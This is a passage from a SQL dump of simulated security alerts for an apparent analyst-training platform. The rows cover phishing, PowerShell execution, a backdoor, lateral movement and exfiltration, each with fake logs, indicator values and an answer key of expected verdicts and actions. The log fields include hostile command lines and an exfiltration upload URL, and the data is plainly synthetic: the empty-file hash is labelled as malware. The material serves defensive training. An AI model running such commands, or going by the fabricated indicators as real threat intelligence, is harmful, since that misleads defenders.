Directory\",\"verdict\":\"suspicious\",\"details\":\"Unusual activity detected from admin account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.154Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:14:23Z\\\",\\\"event_type\\\":\\\"file_modification\\\",\\\"user\\\":\\\"malicious_actor\\\",\\\"affected_files\\\":[\\\"/var/log/auth.log\\\",\\\"/var/log/syslog\\\"],\\\"modification_type\\\":\\\"delete\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.10\\\",\\\"hashes\\\":[\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"d41d8cd98f00b204e9800998ecf8427e\\\"],\\\"associated_username\\\":\\\"admin_user\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(538, 'Suspicious Cloud Service Access', 'medium', 'Firewall logs', 'A compromised email account was used to send phishing emails containing links to payloads hosted on OneDrive. This appears to be an attempt to gain initial access to the network.', 'Initial Access', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T10:15:30Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"src_port\":443,\"dst_port\":58642,\"protocol\":\"HTTPS\",\"action\":\"allowed\",\"username\":\"compromised_user@domain.com\",\"url\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"filename\":\"Invoice_Details.docx\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"email_subject\":\"Urgent: Invoice Details Required\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://onedrive.live.com/download?cid=1234abcd&resid=1234abcd%2D5678%2D90ef%2D1234%2D567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis\",\"verdict\":\"suspicious\",\"details\":\"URL used in phishing email to deliver malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Details.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash 
Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malware delivery.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"compromised_user@domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Account Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity consistent with compromise.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(539, 'Cloud Atlas Malware Execution', 'high', 'Endpoint detection and response (EDR) logs', 'Upon successful initial access, the Cloud Atlas malware is executed on the target systems, utilizing PowerShell scripts to maintain stealth and execute remote commands.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\deployUpdate.ps1\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"deployUpdate.ps1\",\"event_description\":\"PowerShell script executed for potential remote command execution\",\"os_version\":\"Windows 10 Pro\",\"device_name\":\"DESKTOP-AB123CD\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a company asset\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware hash associated with Cloud Atlas\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"deployUpdate.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal File Inventory\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file not commonly used in 
environment\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"clean\",\"details\":\"Active employee with system access\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(540, 'Encrypted Data Exfiltration via Cloud Storage', 'high', 'Network traffic analysis', 'Network traffic analysis has identified suspicious encrypted data transfers from an internal system to a cloud storage service. The data is believed to be encrypted diplomatic communications exfiltrated to a Google Drive account, potentially for malicious purposes.', 'Exfiltration', 'T1567.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"35.190.247.1\",\"src_port\":443,\"dst_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe@diplomacy.gov\",\"filename\":\"encrypted_comm_20231015.bin\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"cloud_service\":\"Google Drive\",\"action\":\"upload\",\"bytes_sent\":1048576,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\"}', '2026-01-07 22:29:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal host suspected to be compromised.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"35.190.247.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Google Cloud\",\"verdict\":\"suspicious\",\"details\":\"Google Drive IP used for potential data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with encrypted payload used in exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"encrypted_comm_20231015.bin\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File suspected to contain sensitive encrypted 
communications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(541, 'Unauthorized Access Detected', 'high', 'Email Gateway Logs', 'Rocra initiates its attack by sending spear-phishing emails containing malicious attachments to gain initial foothold in the network.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"email_id\":\"c2c9d5a3-5b4f-4099-a6e5-124ae6d2b5f7\",\"from\":\"attacker@example.malicious\",\"to\":\"user@targetcompany.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_Update_2023.docx\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.45\",\"username\":\"jdoe\",\"malware_family\":\"Rocra\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@example.malicious\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with Rocra.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address linked to Rocra command and control servers.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_Update_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern commonly used in phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Unauthorized Access Detected\",\"date\":\"2026-02-01T20:32:22.160Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(542, 'Execution of Malicious Payload', 'high', 'Endpoint Security Alerts', 'Once access is achieved, the Rocra malware executes its payload, allowing attackers to remotely control infected machines. This step indicates the execution phase of the attack with potential remote control capabilities.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"username\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"malware_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"file_name\":\"Rocra_Payload.exe\",\"action\":\"Execution\",\"status\":\"Success\",\"severity\":\"High\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Rocra APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Rocra malware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Rocra_Payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security\",\"verdict\":\"malicious\",\"details\":\"Filename detected during execution of Rocra malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"clean\",\"details\":\"Legitimate internal 
user.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(543, 'Establishing Backdoor for Persistence', 'high', 'Network Traffic Analysis', 'Rocra sets up a backdoor on the compromised systems, enabling persistent access even after reboots or network changes. Network traffic indicates communication with a known malicious IP and the transfer of a backdoor executable.', 'Persistence', 'T1059: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"destination_port\":80,\"event_type\":\"network\",\"file\":{\"name\":\"backdoor.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user\":\"compromised_user\",\"action\":\"file_download\",\"status\":\"success\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocra APT.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Rocra backdoor executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File name associated with malicious activity.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual 
behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(544, 'Stealthy Lateral Movement', 'high', 'Active Directory Logs', 'Rocra uses stolen credentials to move laterally within the network, searching for sensitive diplomatic and research data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:23:45Z\",\"event_id\":\"4624\",\"logon_type\":3,\"target_username\":\"jdoe\",\"target_domain\":\"CORP\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"10.10.3.15\",\"authentication_package\":\"Kerberos\",\"logon_process\":\"NtLmSsp\",\"subject_user_name\":\"admin_elevated\",\"subject_domain_name\":\"CORP\",\"subject_logon_id\":\"0x3E7\",\"hashes\":[\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\"],\"event_description\":\"An account was successfully logged on.\"}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network_scanning\",\"verdict\":\"internal\",\"details\":\"Internal IP used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.10.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"network_logs\",\"verdict\":\"internal\",\"details\":\"Destination IP for the lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_activity_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Stolen credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"f5d8ee39d9f9a6bfcf7e9e8ae281d756\",\"is_critical\":false,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"Potentially associated with known APT activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Identity\",\"evidence\":{\"user\":{\"username\":\"jdoe\",\"display_name\":\"John Doe\",\"department\":\"Finance\",\"manager\":\"Jane Smith\"},\"risk_score\":85,\"recent_activity\":[{\"action\":\"Login Success\",\"ip\":\"10.0.0.5\",\"location\":\"New York, US\",\"time\":\"09:00 AM\"},{\"action\":\"Password Reset Request\",\"ip\":\"192.168.1.5\",\"location\":\"New York, US\",\"time\":\"09:05 AM\"},{\"action\":\"Login Failed\",\"ip\":\"203.0.113.99\",\"location\":\"Moscow, RU\",\"time\":\"02:00 AM\",\"flag\":true}]}}', 0),
(545, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) Alerts', 'The final stage sees Rocra exfiltrating targeted data, including encrypted and previously deleted files, marking the success of their espionage mission.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:32:00Z\",\"event\":\"data_exfiltration\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"encrypted_project_files.zip\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"exfil_method\":\"HTTP POST\",\"destination_url\":\"http://malicious-domain.com/upload\",\"associated_user\":\"jdoe@company.com\",\"alert_id\":\"DLP-2023-5678\",\"indicator_of_compromise\":[\"IP:203.0.113.45\",\"HASH:b1946ac92492d2347c6235b4d2611184\",\"URL:http://malicious-domain.com/upload\"]}', '2026-01-07 22:29:58', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malware samples.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-domain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL used for data exfiltration in previous incidents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:32:00Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"encrypted_project_files.zip\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"exfil_method\\\":\\\"HTTP POST\\\",\\\"destination_url\\\":\\\"http://malicious-domain.com/upload\\\",\\\"associated_user\\\":\\\"jdoe@company.com\\\",\\\"alert_id\\\":\\\"DLP-2023-5678\\\",\\\"indicator_of_compromise\\\":[\\\"IP:203.0.113.45\\\",\\\"HASH:b1946ac92492d2347c6235b4d2611184\\\",\\\"URL:http://malicious-domain.com/upload\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.168Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 